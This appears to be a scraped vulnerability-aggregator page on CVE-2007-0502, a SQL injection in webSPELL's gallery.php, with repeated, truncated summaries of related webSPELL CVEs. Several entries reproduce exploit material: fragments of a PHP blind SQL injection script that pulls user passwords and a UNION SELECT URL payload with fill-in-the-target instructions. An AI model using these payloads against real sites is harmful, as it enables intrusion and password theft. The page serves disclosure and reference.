CVE-2007-0502

The CVE-2007-0502 entry corresponds to a SQL injection in webSPELL 4.01.02, affecting gallery.php via the picID parameter. The vulnerability is remote and allows arbitrary SQL execution; this is a separate vector from CVE-2007-0492. Connected documents confirm the affected application (webSPELL 4...

CVE-2007-0502

SQL injection vulnerability in gallery.php in webSPELL 4.01.02 allows remote attackers to execute arbitrary SQL commands via the picID parameter, a different vector than CVE-2007-0492...

Sql injection

Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the 1 id or 2 galleryID parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...

CVE-2007-0492

Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the 1 id or 2 galleryID parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...

CVE-2007-0492

CVE-2007-0492 involves multiple SQL injection vulnerabilities in gallery.php of webSPELL 4.01.02 and earlier. The underlying issue is unsanitized input parameters (1) id or (2) galleryID that allow remote attackers to inject arbitrary SQL commands, enabling data tampering or extraction. The vulne...

CVE-2007-0492

Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the 1 id or 2 galleryID parameter. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information...

webSPELL 4.01.02 (gallery.php) Remote Blind SQL Injection Exploit

No description provided by source. ?php //webSPELL SQL-injection exploit in gallery.php $xpl = new phpsploit; $xpl-allowredirection1; $xpl-cookiejar1; function istrue$xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h...

webSPELL 4.01.02 (gallery.php) Remote Blind SQL Injection Exploit

Exploit for unknown platform in category web applications ================================================================= webSPELL 4.01.02 gallery.php Remote Blind SQL Injection Exploit ================================================================= allowredirection1; $xpl-cookiejar1; functio...

webSPELL 4.01.02 - gallery.php Blind SQL Injection

webSPELL 4.01.02 - gallery.php Blind SQL Injection allowredirection1; $xpl-cookiejar1; function istrue$xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h...

webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection

allowredirection1; $xpl-cookiejar1; function istrue$xpl,$host,$path,$prefix,$gid,$pid,$uid,$i,$h $xpl-get"http://".$host.$path."gallery.php?action=window&galleryID=".$gid."&picID=".$pid."%20AND%20MIDSELECT%20password%20FROM%20".$prefix."user%20WHERE%20userID=".$uid.",".$i.",1=CHAR".$h."";...

CVE-2006-5388

SQL injection vulnerability in index.php in WebSPELL 4.01.01 and earlier allows remote attackers to execute arbitrary SQL commands via the getsquad parameter, a different vector than CVE-2006-4783...

CVE-2006-5388

SQL injection vulnerability in index.php in WebSPELL 4.01.01 and earlier allows remote attackers to execute arbitrary SQL commands via the getsquad parameter, a different vector than CVE-2006-4783...

CVE-2006-5388

Technical details about CVE-2006-5388 are not provided in the connected documents. The initial description mentions a SQL injection in WebSPELL 4.01.01 and earlier via the getsquad parameter, but no further specifics are supplied here. Monitor for updates.

webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.php PAGE with "yourwebsite.de" PATH with...

webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

No description provided by source. WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.php PAGE...

webSPELL 4.01.01 - getsquad SQL Injection

webSPELL 4.01.01 - getsquad SQL Injection WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.ph...

webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =========================================================== webSPELL = 4.01.01 getsquad Remote SQL Injection Exploit =========================================================== WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by:...

webSPELL 4.01.01 - &#039;getsquad&#039; SQL Injection

WebSPELL = 4.01.01 getsquad Remote SQL Injection Exploit by: Kiba EXPLOIT: http://PAGE/PATH/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+PREFIXuser/ REPLACE: if the website is http://yourwebsite.de/webspell/index.php PAGE with "yourwebsite.de" PATH with...

CVE-2006-4783

SQL injection vulnerability in squads.php in WebSPELL 4.01.01 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary SQL commands via the squadID parameter...

CVE-2006-4782

src/index.php in WebSPELL 4.01.01 and earlier, when registerglobals is enabled, allows remote attackers to bypass authentication and gain sensitive information stored in the database via a modified userID parameter in a write action to admin/database.php...